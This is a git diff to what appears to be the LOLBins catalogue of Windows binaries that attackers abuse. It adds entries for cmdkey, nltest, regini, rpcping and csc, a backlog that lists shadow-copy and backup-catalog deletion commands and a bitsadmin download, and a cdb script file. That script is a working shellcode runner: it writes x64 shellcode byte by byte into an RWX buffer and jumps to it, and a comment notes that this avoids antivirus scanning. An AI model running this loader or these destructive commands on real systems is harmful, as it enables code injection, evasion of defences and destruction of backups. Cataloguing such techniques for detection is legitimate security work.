diff --git a/Backlog.txt b/Backlog.txt new file mode 100644 index 0000000..9d8c7e3 --- /dev/null +++ b/Backlog.txt @@ -0,0 +1,17 @@ +Ntsd.exe Debugger +Kd.exe Debugger +Certreq.exe Exfiltrate data +Dbghost.exe +Robocopy.exe Needs examples +Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 +Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet +notepad.exe Gui - Download files using Open (A lot of other programs as well) +netsh.exe Netsh helper dll file loading +wbadmin.exe wbadmin delete catalog -quiet +psexec.exe Remote execution of code +java.exe -agentpath: or -agentlib: +WinMail.exe DLL Sideloading +odbcad32.exe GUI DLL Loading +WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f +dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/ +http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/ diff --git a/Contribute.md b/Contribute.md index 45c2710..4e64756 100644 --- a/Contribute.md +++ b/Contribute.md @@ -4,7 +4,7 @@ to send me a tweet and I will add the contribution for you. ## Binary.exe -* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search +* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials ``` Example @@ -29,4 +29,8 @@ Notes: Some specific details about the binary file. +Detection: +Details about detection. +IOC, Behaviour , User Agents etc + diff --git a/LOLBins.md b/LOLBins.md index 3121a54..9daa59c 100644 --- a/LOLBins.md +++ b/LOLBins.md @@ -8,8 +8,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Atbroker.exe](OSBinaries/Atbroker.md) [Bash.exe](OSBinaries/Bash.md) [Certutil.exe](OSBinaries/Certutil.md) +[Cmdkey.exe](OSBinaries/Cmdkey.md) [Cmstp.exe](OSBinaries/Cmstp.md) [Control.exe](OSBinaries/Control.md) +[Csc.exe](OSBinaries/Csc.md) [Cscript.exe](OSBinaries/Cscript.md) [Dfsvc.exe](OSBinaries/Dfsvc.md) [Diskshadow.exe](OSBinaries/Diskshadow.md) @@ -30,6 +32,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Msdt.exe](OSBinaries/Msdt.md) [Mshta.exe](OSBinaries/Mshta.md) [Msiexec.exe](OSBinaries/Msiexec.md) +[Nltest.exe](OSBinaries/Nltest.md) [Odbcconf.exe](OSBinaries/Odbcconf.md) [Pcalua.exe](OSBinaries/Pcalua.md) [Powershell.exe](OSBinaries/Powershell.md) @@ -38,10 +41,12 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Reg.exe](OSBinaries/Reg.md) [Regedit.exe](OSBinaries/Regedit.md) [Regasm.exe](OSBinaries/Regasm.md) +[Regini.exe](OSBinaries/Regini.md) [Regsvcs.exe](OSBinaries/Regsvcs.md) [Regsvr32.exe](OSBinaries/Regsvr32.md) -[Robocopy.exe](OSBinaries/Robocopy.md) [Replace.exe](OSBinaries/Replace.md) +[Robocopy.exe](OSBinaries/Robocopy.md) +[Rpcping.exe](OSBinaries/Rpcping.md) [Rundll32.exe](OSBinaries/Rundll32.md) [Runscripthelper.exe](OSBinaries/Runscripthelper.md) [Sc.exe](OSBinaries/Sc.md) diff --git a/OSBinaries/Cmdkey.md b/OSBinaries/Cmdkey.md new file mode 100644 index 0000000..adf4324 --- /dev/null +++ b/OSBinaries/Cmdkey.md @@ -0,0 +1,30 @@ +## Cmdkey.exe + +* Functions: Credentials + +``` +cmdkey /list +``` + +Acknowledgements: +* + +Code sample: +* + +Resources: +* https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation + +Full path: +``` +c:\windows\system32\cmdkey.exe +c:\windows\sysWOW64\cmdkey.exe +``` + +Notes: + + +Detection: + + + diff --git a/OSBinaries/Csc.med b/OSBinaries/Csc.med new file mode 100644 index 0000000..452fc1f --- /dev/null +++ b/OSBinaries/Csc.med @@ -0,0 +1,31 @@ +## Csc.exe + +* Functions: Compile + +``` +csc -out:My.exe File.cs + +csc -target:library File.cs +``` + +Acknowledgements: +* ? + +Code sample: +* + +Resources: +* https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe +* + +Full path: +``` +C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe +``` + +Notes: + + +Detection: +? \ No newline at end of file diff --git a/OSBinaries/Nltest.md b/OSBinaries/Nltest.md new file mode 100644 index 0000000..6429ba5 --- /dev/null +++ b/OSBinaries/Nltest.md @@ -0,0 +1,28 @@ +## Nltest.exe + +* Functions: Credentials + +``` +nltest.exe /SERVER:192.168.1.10 /QUERY +``` + +Acknowledgements: +* Sysopfb - @sysopfb + +Code sample: +* + +Resources: +* https://twitter.com/sysopfb/status/986799053668139009 + +Full path: +``` +c:\windows\system32\nltest.exe +``` + +Notes: + + +Detection: + + diff --git a/OSBinaries/Regini.md b/OSBinaries/Regini.md new file mode 100644 index 0000000..276845a --- /dev/null +++ b/OSBinaries/Regini.md @@ -0,0 +1,29 @@ +## Regini.exe + +* Functions: Credentials + +``` +regini -m \\RemoteServer Example +``` + +Acknowledgements: +* Osanda Malith - @OsandaMalith + +Code sample: +* + +Resources: +* https://twitter.com/OsandaMalith/status/987823644402372608 + +Full path: +``` +c:\windows\system32\regini.exe +c:\windows\sysWOW64\regini.exe +``` + +Notes: +Can also be used to add registry keys + +Detection: + + diff --git a/OSBinaries/Rpcping.md b/OSBinaries/Rpcping.md new file mode 100644 index 0000000..0ba654b --- /dev/null +++ b/OSBinaries/Rpcping.md @@ -0,0 +1,34 @@ +## Rpcping.exe + +* Functions: Credentials + +``` +rpcping -s 127.0.0.1 -t ncacn_np + +rpcping -s 192.168.1.10 -t ncacn_np +``` + +Acknowledgements: +* Casey Smith - @subtee + +Code sample: +* + +Resources: +* https://twitter.com/subtee/status/872797890539913216 +* https://github.com/vysec/RedTips +* + +Full path: +``` +c:\windows\system32\rpcping.exe +c:\windows\sysWOW64\rpcping.exe +``` + +Notes: + + +Detection: + + + diff --git a/OSBinaries/Wmic.md b/OSBinaries/Wmic.md index f07751b..277393c 100644 --- a/OSBinaries/Wmic.md +++ b/OSBinaries/Wmic.md @@ -36,7 +36,7 @@ Acknowledgements: * Casey Smith - @subtee Code sample: -* [Wmic_calc.xsl](Payloads/Wmic_calc.xls) +* [Wmic_calc.xsl](Payloads/Wmic_calc.xsl) Resources: * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory diff --git a/OtherMSBinaries/Cdb.md b/OtherMSBinaries/Cdb.md index df29bad..2fef143 100644 --- a/OtherMSBinaries/Cdb.md +++ b/OtherMSBinaries/Cdb.md @@ -1,4 +1,4 @@ -## cdb.exe +## Cdb.exe * Functions: Execute @@ -7,5 +7,26 @@ cdb.exe -cf x64_calc.wds -o notepad.exe ``` Acknowledgements: -* Matt Graber - @mattifestation - \ No newline at end of file +* Matt Graeber - @mattifestation + +Code sample: +* [Cdb_calc.wds](Payload/Cdb_calc.wds) + +Resources: +* http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html +* https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options +* https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda + +Full path: +``` +C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe +C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe +``` + +Notes: +Part of the Debugging tools for Windows + + +Detection: +? + diff --git a/OtherMSBinaries/Payload/Cdb_calc.wds b/OtherMSBinaries/Payload/Cdb_calc.wds new file mode 100644 index 0000000..4073bb5 --- /dev/null +++ b/OtherMSBinaries/Payload/Cdb_calc.wds @@ -0,0 +1,93 @@ +$$ Save this to a file - e.g. x64_calc.wds +$$ Example: launch this shellcode in a host notepad.exe process. +$$ cdb.exe -cf x64_calc.wds -o notepad.exe + +$$ Allocate 272 bytes for the shellcode buffer +$$ Save the address of the resulting RWX in the pseudo $t0 register +.foreach /pS 5 ( register { .dvalloc 272 } ) { r @$t0 = register } + +$$ Copy each individual shellcode byte to the allocated RWX buffer +$$ Note: The `eq` command could be used to save space, if desired. +$$ Note: .readmem can be used to read a shellcode buffer too but +$$ shellcode on disk will be subject to AV scanning. +;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4 +;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00 +;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51 +;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51 +;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2 +;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52 +;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52 +;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52 +;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72 +;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7 +;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb @$t0+2B 31 +;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0 +;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C +;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41 +;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41 +;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED +;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48 +;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B +;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01 +;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88 +;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48 +;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67 +;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50 +;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44 +;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49 +;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56 +;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41 +;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48 +;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31 +;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0 +;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9 +;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1 +;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1 +;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24 +;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1 +;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44 +;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49 +;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41 +;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44 +;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49 +;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B +;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01 +;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41 +;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A +;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59 +;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83 +;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52 +;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41 +;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B +;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF +;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48 +;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00 +;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00 +;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D +;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00 +;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B +;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5 +;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A +;eb @$t0+E8 0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6 +;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF +;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4 +;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C +;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0 +;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47 +;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A +;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89 +;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63 +;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00 + +$$ Redirect execution to the shellcode buffer +r @$ip=@$t0 + +$$ Continue program execution - i.e. execute the shellcode +g + +$$ Continue program execution after hitting a breakpoint +$$ upon starting calc.exe. This is specific to this shellcode. +g + +$$ quit cdb.exe +q \ No newline at end of file